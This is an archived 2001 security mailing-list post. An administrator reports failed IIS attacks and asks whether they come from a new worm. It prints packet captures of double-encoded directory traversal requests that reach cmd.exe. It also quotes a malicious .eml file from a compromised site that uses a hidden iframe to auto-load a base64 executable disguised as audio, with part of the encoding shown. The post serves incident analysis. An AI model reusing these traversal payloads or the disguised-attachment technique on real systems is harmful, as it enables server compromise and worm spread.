New worm? 'readme.eml'

From: Pedro Miller Rabinovitch (pedro@cipher.com.br)
Date: 09/18/01


Message-Id: <a05001905b7cd14f52dda@[192.168.1.71]>
Date: Tue, 18 Sep 2001 12:13:32 -0300
To: forensics@SECURITYFOCUS.COM
From: Pedro Miller Rabinovitch <pedro@cipher.com.br>
Subject: New worm? 'readme.eml'

Hi,

   is this CodeBlue? Some new worm? Or just one I hadn't heard about?
It uses double-encoding exploits, and propagates both by adding
javascript to the main page and by probing other systems...

Report:

Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:

Date Time D Source IP Sport Dport P
01Sep18 11:20 T 200.192.226.40 3933 80 T
01Sep18 11:20 T 200.192.226.40 3767 80 T
01Sep18 11:20 T 200.192.226.40 3572 80 T

  SOURCE: 200.192.226.40

  45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx
E...ba@.w..=...(xxxx
  0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00
...P{....~.NP."8.z..
  47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET
/_vti_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35
c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63
c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31
md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e
.0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a ection: close....

  45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx
E....c@.w..:...(xxxx
  0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00
...P{....O..P."8....
  47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET
/_mem_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35
c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63
c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31
md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e
.0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a ection: close....

  45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx
E...9e@.w.?....(xxxx
  0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00
.].P{."6.LZ.P."8.6..
  47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e GET
/msadc/..%255c..
  2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e
/..%255c../..%255c/.
  2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e
.%c1%1c../..%c1%1c..
  2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79
/..%c1%1c../winnt/sy
  73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69
stem32/cmd.exe?/c+di
  72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 r
HTTP/1.0..Host: ww
  77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73
w..Connnection: clos
  65 0d 0a 0d 0a e....

---------------

When I connected to the originating server (femm.tdkomm.com.br), I
saw the normal web page for the institution, plus a pop-up window for
http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as
follows:

MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh)

Has anyone seen this?

Regards,

        Pedro.

-- 
Pedro Miller Rabinovitch
Technology Manager
Cipher Technology
55-21-2579-3999
http://www.cipher.com.br



Relevant Pages

  • New worm? readme.eml
    ... Subject: New worm? ... and propagates both by adding ... javascript to the main page and by probing other systems... ... md.exe?/c+dir HTTP/1 ...
    (Incidents)
  • RE: New worm? readme.eml
    ... There is a new mass-mailing worm that utilizes email to propagate itself. ... the worm sends out probes to IIS servers attempting to spread ... The worm will also attempt to spread via open network shares. ... md.exe?/c+dir HTTP/1 ...
    (Focus-IDS)
  • RE: New worm? readme.eml
    ... There is a new mass-mailing worm that utilizes email to propagate itself. ... the worm sends out probes to IIS servers attempting to spread ... The worm will also attempt to spread via open network shares. ... md.exe?/c+dir HTTP/1 ...
    (Focus-Microsoft)
  • RE: New worm? readme.eml
    ... Hm, have just check my snort logs and see a code red scan, ... The ip was pointing to www.forlog.fr ... Definitely a new worm ... ... md.exe?/c+dir HTTP/1 ...
    (Focus-IDS)
  • Re: Anti-war quotes quiz and protest effects with JavaScript
    ... > And If I code a worm in JavaScript, IYHO this would be on-topic, too? ... A good-faith antiwar post is an opinion and not a worm. ... My reply concerns the very possibility of a nondefault politics in ... where programmers are unfairly expected in a free society ...
    (comp.programming)